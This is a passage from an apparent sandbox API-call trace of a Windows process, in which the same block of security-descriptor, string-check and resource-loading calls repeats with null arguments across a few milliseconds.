ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.828] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.828] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.828] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.828] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.828] LockResource (hResData=0x0) returned 0x0 [0219.828] FreeResource (hResData=0x0) returned 0 [0219.828] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.828] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.828] LockResource (hResData=0x0) returned 0x0 [0219.828] FreeResource (hResData=0x0) returned 0 [0219.828] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.828] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.828] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.828] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.828] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.828] LockResource (hResData=0x0) returned 0x0 [0219.828] FreeResource (hResData=0x0) returned 0 [0219.828] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.828] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.828] LockResource (hResData=0x0) returned 0x0 [0219.828] FreeResource (hResData=0x0) returned 0 [0219.828] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.828] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.828] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.828] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.828] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.828] LockResource (hResData=0x0) returned 0x0 [0219.829] FreeResource (hResData=0x0) returned 0 [0219.829] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.829] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.829] LockResource (hResData=0x0) returned 0x0 [0219.829] FreeResource (hResData=0x0) returned 0 [0219.829] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.829] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.829] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.829] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.829] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.829] LockResource (hResData=0x0) returned 0x0 [0219.829] FreeResource (hResData=0x0) returned 0 [0219.829] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.829] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.829] LockResource (hResData=0x0) returned 0x0 [0219.829] FreeResource (hResData=0x0) returned 0 [0219.829] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.829] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.829] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.829] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.829] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.829] LockResource (hResData=0x0) returned 0x0 [0219.829] FreeResource (hResData=0x0) returned 0 [0219.829] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.829] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.829] LockResource (hResData=0x0) returned 0x0 [0219.829] FreeResource (hResData=0x0) returned 0 [0219.829] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.829] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.829] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.829] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.829] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.829] LockResource (hResData=0x0) returned 0x0 [0219.829] FreeResource (hResData=0x0) returned 0 [0219.829] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.829] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.829] LockResource (hResData=0x0) returned 0x0 [0219.829] FreeResource (hResData=0x0) returned 0 [0219.829] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.829] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.829] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.829] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.829] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.829] LockResource (hResData=0x0) returned 0x0 [0219.829] FreeResource (hResData=0x0) returned 0 [0219.829] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.829] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.829] LockResource (hResData=0x0) returned 0x0 [0219.830] FreeResource (hResData=0x0) returned 0 [0219.830] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.830] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.830] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.830] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.830] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.830] LockResource (hResData=0x0) returned 0x0 [0219.830] FreeResource (hResData=0x0) returned 0 [0219.830] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.830] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.830] LockResource (hResData=0x0) returned 0x0 [0219.830] FreeResource (hResData=0x0) returned 0 [0219.830] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.830] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.830] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.830] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.830] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.830] LockResource (hResData=0x0) returned 0x0 [0219.830] FreeResource (hResData=0x0) returned 0 [0219.830] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.830] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.830] LockResource (hResData=0x0) returned 0x0 [0219.830] FreeResource (hResData=0x0) returned 0 [0219.830] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.830] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.830] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.830] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.830] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.830] LockResource (hResData=0x0) returned 0x0 [0219.830] FreeResource (hResData=0x0) returned 0 [0219.830] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.830] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.830] LockResource (hResData=0x0) returned 0x0 [0219.830] FreeResource (hResData=0x0) returned 0 [0219.830] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.830] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.830] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.830] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.830] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.830] LockResource (hResData=0x0) returned 0x0 [0219.830] FreeResource (hResData=0x0) returned 0 [0219.830] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.830] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.830] LockResource (hResData=0x0) returned 0x0 [0219.830] FreeResource (hResData=0x0) returned 0 [0219.830] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.830] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.830] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.830] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.831] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.831] LockResource (hResData=0x0) returned 0x0 [0219.831] FreeResource (hResData=0x0) returned 0 [0219.831] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.831] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.831] LockResource (hResData=0x0) returned 0x0 [0219.831] FreeResource (hResData=0x0) returned 0 [0219.831] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.831] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.831] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.831] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.831] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.831] LockResource (hResData=0x0) returned 0x0 [0219.831] FreeResource (hResData=0x0) returned 0 [0219.831] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.831] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.831] LockResource (hResData=0x0) returned 0x0 [0219.831] FreeResource (hResData=0x0) returned 0 [0219.831] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.831] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.831] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.831] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.831] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.831] LockResource (hResData=0x0) returned 0x0 [0219.831] FreeResource (hResData=0x0) returned 0 [0219.831] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.831] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.831] LockResource (hResData=0x0) returned 0x0 [0219.831] FreeResource (hResData=0x0) returned 0 [0219.831] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.831] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.831] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.831] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.831] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.831] LockResource (hResData=0x0) returned 0x0 [0219.831] FreeResource (hResData=0x0) returned 0 [0219.831] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.831] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.831] LockResource (hResData=0x0) returned 0x0 [0219.831] FreeResource (hResData=0x0) returned 0 [0219.831] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.831] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.831] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.831] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.831] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.831] LockResource (hResData=0x0) returned 0x0 [0219.831] FreeResource (hResData=0x0) returned 0 [0219.832] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.832] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.832] LockResource (hResData=0x0) returned 0x0 [0219.832] FreeResource (hResData=0x0) returned 0 [0219.832] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.832] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.832] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.832] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.832] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.832] LockResource (hResData=0x0) returned 0x0 [0219.832] FreeResource (hResData=0x0) returned 0 [0219.832] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.832] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.832] LockResource (hResData=0x0) returned 0x0 [0219.832] FreeResource (hResData=0x0) returned 0 [0219.832] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.832] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.832] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.832] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.832] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.832] LockResource (hResData=0x0) returned 0x0 [0219.832] FreeResource (hResData=0x0) returned 0 [0219.832] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.832] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.832] LockResource (hResData=0x0) returned 0x0 [0219.832] FreeResource (hResData=0x0) returned 0 [0219.832] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.832] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.832] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.832] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.832] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.832] LockResource (hResData=0x0) returned 0x0 [0219.832] FreeResource (hResData=0x0) returned 0 [0219.832] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.832] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.832] LockResource (hResData=0x0) returned 0x0 [0219.832] FreeResource (hResData=0x0) returned 0 [0219.832] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.832] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.832] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.832] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.832] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.832] LockResource (hResData=0x0) returned 0x0 [0219.832] FreeResource (hResData=0x0) returned 0 [0219.832] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.832] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.832] LockResource (hResData=0x0) returned 0x0 [0219.832] FreeResource (hResData=0x0) returned 0 [0219.833] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.833] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.833] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.833] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.833] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.833] LockResource (hResData=0x0) returned 0x0 [0219.833] FreeResource (hResData=0x0) returned 0 [0219.833] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.833] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.833] LockResource (hResData=0x0) returned 0x0 [0219.833] FreeResource (hResData=0x0) returned 0 [0219.833] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.833] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.833] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.833] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.833] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.833] LockResource (hResData=0x0) returned 0x0 [0219.833] FreeResource (hResData=0x0) returned 0 [0219.833] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.833] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.833] LockResource (hResData=0x0) returned 0x0 [0219.833] FreeResource (hResData=0x0) returned 0 [0219.833] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.833] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.833] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.833] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.833] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.833] LockResource (hResData=0x0) returned 0x0 [0219.833] FreeResource (hResData=0x0) returned 0 [0219.833] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.833] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.833] LockResource (hResData=0x0) returned 0x0 [0219.833] FreeResource (hResData=0x0) returned 0 [0219.833] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.833] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.833] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.833] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.833] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.833] LockResource (hResData=0x0) returned 0x0 [0219.833] FreeResource (hResData=0x0) returned 0 [0219.833] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.833] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.833] LockResource (hResData=0x0) returned 0x0 [0219.833] FreeResource (hResData=0x0) returned 0 [0219.833] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.833] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.833] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.833] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.833] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.834] LockResource (hResData=0x0) returned 0x0 [0219.834] FreeResource (hResData=0x0) returned 0 [0219.834] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.834] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.834] LockResource (hResData=0x0) returned 0x0 [0219.834] FreeResource (hResData=0x0) returned 0 [0219.834] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.834] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.834] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.834] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.834] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.834] LockResource (hResData=0x0) returned 0x0 [0219.834] FreeResource (hResData=0x0) returned 0 [0219.834] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.834] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.834] LockResource (hResData=0x0) returned 0x0 [0219.834] FreeResource (hResData=0x0) returned 0 [0219.834] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.834] 